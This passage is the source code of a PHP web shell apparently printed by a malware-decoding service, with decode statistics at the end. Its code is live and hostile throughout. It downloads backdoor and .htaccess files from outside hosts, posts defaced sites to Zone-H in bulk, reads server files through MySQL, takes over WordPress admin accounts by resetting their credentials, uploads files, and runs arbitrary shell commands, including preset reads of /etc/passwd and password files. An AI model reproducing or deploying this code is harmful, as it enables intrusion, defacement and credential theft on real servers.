Cvhrw0VQzl6F3Gj+wPAcrwzLhgnOCaXPiLNMuha/y0tLz3bD0WKtwC7ArVs/tshNdjeoPeKPeIC1MGnM/JPp6RmyRC6YXcUnu4qWGUxEzK3lFcqfkQPj+1240v6MRCHko/DfKKz2Q7mzwuj+FlifHQY6MxiI/3lJBaocnjENvRLQFiK76p1ppKLGkkgFKdRmp04XsUEfHe/WiN4nKvHBP/724q+bM4l6JtKdiMRqsfIoP132PQMvJJQTv8FV4pzLhL9n3OIvt8Nt96dVdIG1vfUdP5876l96RJD7xMmbO0/stRb2BzygRlhJsVjAH36CZw4j83ODQqxZD4fSTG7rhY7VAslgvUqtUKIhZAMH3xOS7w8ilLIFhM876+WuatZpTh69u/jN2tIwMIddeDSCeMTTOneA06kyE6xamh+8oO3CPkOLZEV9B9ZrV9ZWDdfMuS/3OrPM/STXEZH5mm4RJvE/RJloEswsyjV20502w6V5QAyZviyTmctPf/CXwA/bVmYrdsOF1fY2/dkXZmEJwUeAnG5I07TnZX0YICOx2efW0T1wHhOgWVg9MUCWzFN3gklI4r4/MTCUCYyTTGq6p9O+TayrAv51XDFpToaz4zNjcS2BMfPeArUCBiT3YfIo7Y8QwEKlhijp1TCr5Qpp8fFHJS46nZOrSaBrhPjAdvE4ICzY1I/8NaIiybPvN8GfApBDwY1uqgnXzI/autoJ+XDA5clWbZWRjRRm10Ce+bYVuSCDOLlN+1viK0eH8aweJsQ4nlP1u20Sl/EzYlGw+EscsNQI7deBx56nfG4JZorNEdcc/HhU9Ag/nkw1qIkIjU9vFOC360ttTpfhYu2O2ogIELYonlNiF2UknOr+ghmLNLgCtUAxvdw7OYUEQVZRj/qG6jiSQPKxpHf4IUBUT+rp6C8OyBRkRZRVQFeUdSRMbEDTGHY/MSNNt0CmxBTmIuLAlRZNOY/6hnwUbVQ9R/w5x2RTXq7inb3Spe2wZ3F9xjgr0OCJCNMQEVYcmQZWc365RDgsgUZklEAlRJE5rQMQes8vUT34l7U+B9/OgZriTqTA7w/KW/7PtBk27lactqY317h3ztTacqaWAQNxzxv0Xu1juBA8zNEjH8YqlQ+1SSieZul3OX0zM6aNk35CxowyCxinpQWdP2Aqoylo4ouvhZx6Ok713+z85UFTlUordSGRZq2Gaddl9FQONRZUYWHFZtbk0L/f6zf9iHIhCjjf00h/ToQU1Wx7tbPlX/1BSU/volBgiR7twRujRbm+lAatjEWM5wlIDSV6WgmLyna6vz8cIu8em0Qh/OuFbBky6slFeoIgaPEM0kxgY67R3xVSgSD4UhZVAh9Zg+Ba/c9//vOf//yv//jX//73v/4f'))));
break;
case 'addt':
$file = fopen(".htaccess" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/htaccess.txt');
$write = fwrite ($file ,$sa);
$file = fopen("user.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/user.txt');
$write = fwrite ($file ,$sa);
$file = fopen("cgi.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/cgi.txt');
$write = fwrite ($file ,$sa);
$file = fopen("jeentel" ,"w+");
$sa=file_get_contents('http://lojapontoc.com/loja/ext/jeentel');
$write = fwrite ($file ,$sa);
$file = fopen("1.txt" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/1.txt');
$write = fwrite ($file ,$sa);
$file = fopen("backdoor.txt" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/backdoor.txt');
$write = fwrite ($file ,$sa);
$file = fopen("dz.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/dz.txt');
$write = fwrite ($file ,$sa);
$file = fopen("config.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/config.txt');
$write = fwrite ($file ,$sa);
fclose($file);
if ($write) {
echo "The File Was Created Successfuly - Tools Hack In Shell X88 V.2";
}
else {echo"\"error\"";}
chmod("user.dz" , 0755);
chmod("user.dz" , 0755);
chmod("jeentel" , 0755);
chmod("dz.dz" , 0755);
chmod("config.dz" , 0755);
break;
case 'zone';
ob_start();
$sub = get_loaded_extensions();
if(!in_array("curl", $sub)){
die('Curl eklentisi Y??kl?? degil Bu serverde ?al???maz L??tfen server Y?neticisi ile irtibata geciniz');
}
// sar? sar? ?rdekler ucusuyorrrrrr...
?>
<title>SubZ3rr0 Zone-H Mass Deface Poster</title>
<style type="text/css">
.style1 {
text-align: center;
}
.style2 {
font-weight: bold;
}
.style3 {
font-size: large;
color: #FF0000;
}
div#option {
background:#000000;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;
}
</style>
</head>
<?php
if($_POST) {
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
// bosmu dolumu
if ($hacker == "") {
die ("<center>Kim Deface Ettiyse Onun Ad?n? Yaz?n?z<center>");
}
elseif($method == "--------SELECT--------") {
die("<center>Method Bildirmek Zorundas?n?z</center>");
}
elseif($neden == "--------SELECT--------") {
die("<center>Bir Neden Bildirmek Zorundas?n?z</center>");
}
elseif($site == "") {
die("<center>L??tfen Hacklediginiz Siteleri Yaz?n?z</center>");
}
$i = 0;
$sites = explode("\n", $site);
while($i < count($sites)) {
if(substr($sites[$i], 0, 4) != "http") {
$sites[$i] = "http://".$sites[$i];
}
poster("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
++$i;
}
echo "<center><p>Hacklediginiz Siteler Zone-h 'e Postlanm?st?r</p></center>";
}else{
echo '<center>
<img src="http://www.shy22.com/upfiles/izE53172.gif"></img>
<form action="" method="post">
<div id="option">
<p>Defacer<br />
<span class="ok"><input type="text" name="defacer" size="40" /></span> </p>
<p>Y?ntem <br /><select name="hackmode">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option
value="2" >undisclosed (new) vulnerability</option>
<option
value="3" >configuration / admin. mistake</option>
<option
value="4" >brute force attack</option>
<option
value="5" >social engineering</option>
<option
value="6" >Web Server intrusion</option>
<option
value="7" >Web Server external module intrusion</option>
<option
value="8" >Mail Server intrusion</option>
<option
value="9" >FTP Server intrusion</option>
<option
value="10" >SSH Server intrusion</option>
<option
value="11" >Telnet Server intrusion</option>
<option
value="12" >RPC Server intrusion</option>
<option
value="13" >Shares misconfiguration</option>
<option
value="14" >Other Server intrusion</option>
<option
value="15" >SQL Injection</option>
<option
value="16" >URL Poisoning</option>
<option
value="17" >File Inclusion</option>
<option
value="18" >Other Web Application bug</option>
<option
value="19" >Remote administrative panel access through bruteforcing</option>
<option
value="20" >Remote administrative panel access through password guessing</option>
<option
value="21" >Remote administrative panel access through social engineering</option>
<option
value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
<option
value="23" >Access credentials through Man In the Middle attack</option>
<option
value="24" >Remote service password guessing</option>
<option
value="25" >Remote service password bruteforce</option>
<option
value="26" >Rerouting after attacking the Firewall</option>
<option
value="27" >Rerouting after attacking the Router</option>
<option
value="28" >DNS attack through social engineering</option>
<option
value="29" >DNS attack through cache poisoning</option>
<option
value="30" >Not available</option>
</select></p>
<p> Neden Hackledin ? <br /><select name="reason">
<option >--------SELECT--------</option>
<option
value="1" >Heh...just for fun!</option>
<option
value="2" >Revenge against that website</option>
<option
value="3" >Political reasons</option>
<option
value="4" >As a challenge</option>
<option
value="5" >I just want to be the best defacer</option>
<option
value="6" >Patriotism</option>
<option
value="7" >Not available</option>
</select> </p>
<p>Siteler <br />
<span class="fur">Siteleri Alt Alta Gelecek ??ekilde Yaz?n?z</span><br />
<span class=""><textarea name="domain" cols="43" rows="17"></textarea></span> </p>
<p><input type="submit" value="G?nder Gitsin :)" />
</form>
<div class ="sub">kodlayan SubZ3rr0 </div>
<br>
</div>
</center>';
}
function poster($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=".$site."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
break;
case 'readbysql':
echo '<form method="post" dir="ltr">
<table border="0" cellspacing="1" width="109" dir="ltr">
<tr>
<td width="312" dir="ltr"><span style="font-size: 9pt">
<font face="Comic Sans MS"><font color="#FFFFFF">DataBase : </font>
<font color="#FFFFFF" face="Tahoma"> <input type="text" name="dbname" size="20"></font><font color="#FFFFFF">
</font></font>
</span></td>
<td width="245" dir="ltr"><span style="font-size: 9pt">
<font face="Comic Sans MS" color="#FFFFFF">Username :<br>
</font><font color="#FFFFFF" face="Comic Sans MS">
<input type="text" name="dbuser" size="20"></font></span></td>
<td width="117" dir="ltr"><span style="font-size: 9pt">
<font color="#FFFFFF" face="Comic Sans MS">Password :</font><font face="Tahoma"><input type="text" name="dbpass" size="20"></font></span></td>
</tr>
<tr>
<td width="558" valign="middle" colspan="2" dir="ltr">
<p align="left" dir="ltr"><span style="font-size: 9pt">
<font face="Comic Sans MS" color="#FFFFFF">Dir :</font><font face="Tahoma">
<input type="text" name="path1" size="28" value=""></font></span></td>
<td width="117" valign="middle" dir="ltr">
<font face="Tahoma"><span style="font-size: 9pt">
<input type="submit" value="Read" name="exec"></span></font></td><center>
</tr>
<td width="670" valign="middle" colspan="3" dir="ltr" height="105">
<textarea rows="17" name="result" cols="54">';
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) && !empty($_POST['dbpass']) && !empty($_POST['path1']))
{
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$path1 = $_POST['path1'];
if(mysql_connect( "localhost", $dbuser, $dbpass ))
{
$drop= "DROP TABLE $dbname.`bypass`" ;
$query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT NULL);";
mysql_query($drop);
mysql_query($query);
mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'" . " INTO TABLE " . $dbname . ".bypass");
$result =mysql_db_query($dbname,"SELECT * FROM bypass ");
$numrows = mysql_num_rows($result);
while($row = mysql_fetch_array($result)) {
echo $row[fileview] ;
}
}
}
echo'</textarea></td></tr></table>';
break;
case 'upload':
echo '</pre></form>';
if (isset($_POST['upload'])) { $savefile = getcwd()."/" . $_FILES['file']['name']['0']; move_uploaded_file($_FILES['file']['tmp_name']['0'], $savefile); $filesizename = array(" Bytes", " KB", " MB", " GB", " TB", " PB", " EB", " ZB", " YB"); $size = round($_FILES['file']['size']['0']/pow(1024, ($i = floor(log($_FILES['file']['size']['0'], 1024)))), 2) . $filesizename[$i];print "<b>Uploaded be completed !</b><br>Details:<br>Filename: <b>" . $_FILES['file']['name']['0'] . "</b>.<br>Size: <b>" . $size . "</b>.";}
echo '<br><u><b>Upload Files:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="file" name="file[]" size="50"><br><input type="submit" value="Upload File !" name="upload"></form><hr><br>';
if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text']; $newfile=$_POST['rename']; if (!copy($file, $newfile)) {echo "failed to copy $file...\\n";}}
echo '<u><b>Upload Files From URL:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="text" name="upload_url_text" size="50"><br>Rename to: <input type="text" name="rename" size="10" value="inj.php"><br><input type="submit" value="Upload File !" name="upload_url"></form>';
break;
case 'edit':
print'<body bgcolor=#000000>
<p align="center">';
if($_POST[incl] != ""){
$file = @fopen($_POST[incl],r);
$data=@fread($file,1546768);
$msr = str_replace("\\\\","\\",$_POST[incl]);
print '<form action="" method="POST"><br>
<div align="center"><font size="4" color="#008000">Path : </font><input name="incl" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FF0033; background-color:#000000" value="'.$msr.'" align="LEFT" size="103" /> <br></form>
<form action="" method="POST"><div align="center"><input name="incle" type="hidden" value="'.$msr.'" align="LEFT" size="45" /><textarea name="kr" style="border:1px dotted #CCFF00; width: 700px; height: 450px; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#000000" >'.htmlspecialchars($data).'</textarea><br><input type="submit" value="Save">';
exit;
}
if($_POST[kr]){
$fl = str_replace("\'","'",$_POST[kr]);
$fl = str_replace('\"','"',$fl);
$fl = str_replace('\\\\','\\',$fl);
$d = @fopen($_POST[incle], 'w');
@fwrite($d,$fl);
@fclose($d);
if($d){
print'<font size="4" color="#008000">Saved !!</font><br>';
exit;}else{print'<font size="4" color="#008000">Cann\'t Save !!</font><br>';
exit;}}
print'<div align="center">
<form action="" method="POST">
<input name="incl" type="submit" value="'.$_GET['file'].'" align="LEFT" size="45" style="border:1px dotted #0080ff; font-family:Tahoma; font-size:8pt; color:#CCFF00; background-color:#80a0a0"/> <br>
';
exit;
break;
case 'wpps':
if(empty($_POST['pwd'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"wp-\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"wp-\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"**\" name=\"password\" type=\"password\"><br>
<br>
Set A New username 4 Login : <INPUT name=\"admin\" size=\"15\" value=\"admin\"><br>
Set A New password 4 Login : <INPUT name=\"pwd\" size=\"15\" value=\"123456\"><br>
<INPUT value=\"change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
if($a4s){
echo "<b> Success :Now Use A New User And Pass To login In The Admin Panel</b> ";
}
}
break;
}
}
else //Default page that will be shown when the page isn't found or no page is selected.
{
$files = array();
$directories = array();
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = realpath('.').'/';
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
print "File:". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "File upload failed!";
}
}
print "<table border=0 width=100%><td width=15% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
if ($handle = opendir('.'))
{
while (false !== ($file = readdir($handle)))
{
if(is_dir($file))
{
$directories[] = $file;
}
else
{
$files[] = $file;
}
}
asort($directories);
asort($files);
foreach($directories as $file)
{
print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a>
<a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a>
<a href=\"?fdownload=".realpath($file)."\"><font size='2'><font color='#ffc080' size='2'>[Dwnld]</font></a>
</td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
foreach($files as $file)
{
print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a>
<a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a>
<a href=\"?fdownload=".realpath($file)."\"><font color='#ffc080' size='2'>[Dwnld]</font></a>
</td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
}
}
else
{
print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
}
print "</table><hr><table border=0 width=100%><td><b>~[ Upload File ]~</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type='hidden' name='MAX_FILE_SIZE' value='100000000' style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' /><input size=30 style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' name='uploadedfile' type='file'><input type='submit' value='Upload File !' name='uploadedfile' style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\">
</form></td><td><form action=\"".$me."\" method=GET><b>~[ Go Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=submit value=\" Go Dir\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>~[ Create File, Read File ]~<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create File\" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form>
</td><td><form action=\"".$me."\" method=GET><b>~[ Make Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Make Dir \" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form></td>
</table>";
echo "<table border='2'>";
print_r('
<form method="POST" action="">
<b>Command :</font></b><input size=40 name="comx1" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"><input value="Enter" type="submit" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form>
<form method="POST" action="">
<select size="1" size=60 name="comxx" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">رؤية البورتات المفتوحه بالسيرفر</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
<option value="ls -lia">ls -lia</option>
<option value="cat /home/*/public_html/_vti_pvt/access.cnf">cat /home/*/public_html/_vti_pvt/access.cnf</option>
<option value="cat /home/*/public_html/_vti_pvt/service.pwd">cat /home/*/public_html/_vti_pvt/service.pwd</option>
<option value="cat /usr/local/apache/conf/httpd.conf">cat /usr/local/apache/conf/httpd.conf</option>
</select> <input type="submit" value="Enter" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000">
</form>
</pre>
');
$comn1=shell_exec($_POST[comx1]);
$comn2=shell_exec($_POST[comxx]);
if($comn2 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn2</textarea>";
if($comn1 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn1</textarea>";
echo "</textarea>";
echo '</h4></pre></center></table></td>';
echo '</b></center></td></tr></table>';
}
function reload()
{
header("Location: ".basename(__FILE__));
}
function get_execution_method()
{
if(function_exists('passthru')){ $m = "passthru"; }
if(function_exists('exec')){ $m = "exec"; }
if(function_exists('shell_exec')){ $m = "shell_ exec"; }
if(function_exists('system')){ $m = "system"; }
if(!isset($m)) //No method found :-|
{
$m = "Disabled";
}
return($m);
}
function execute_command($method,$command)
{
if($method == "passthru")
{
passthru($command);
}
elseif($method == "exec")
{
exec($command,$result);
foreach($result as $output)
{
print $output."<br>";
}
}
elseif($method == "shell_exec")
{
print shell_exec($command);
}
elseif($method == "system")
{
system($command);
}
}
function perm($file)
{
if(file_exists($file))
{
return substr(sprintf('%o', fileperms($file)), -4);
}
else
{
return "????";
}
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}
}
function show_dirs($where)
{
if(ereg("^c:",realpath($where)))
{
$dirparts = explode('\\',realpath($where));
}
else
{
$dirparts = explode('/',realpath($where));
}
$i = 0;
$total = "";
foreach($dirparts as $part)
{
$p = 0;
$pre = "";
while($p != $i)
{
$pre .= $dirparts[$p]."/";
$p++;
}
$total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
$i++;
}
return "<h2>".$total."</h2><br>";
}
print $footer;
exit();
?>
<script language="JavaScript">
<!--
var x = 0
var speed = 300
var text = "[~ Dr.Zer0 - Ml7S-HaCkErS - Namrod Hacker ~]"
function Blinky() {
window.status = text
setTimeout("Blinky2()", speed)
}
function Blinky2() {
window.status = " "
setTimeout("Blinky()", speed)
}
Blinky()
</script>
Function Calls
| None |
Stats
| MD5 | 73202e4fccfa6906c13bab9daff1c0a0 |
| Eval Count | 0 |
| Decode Time | 204 ms |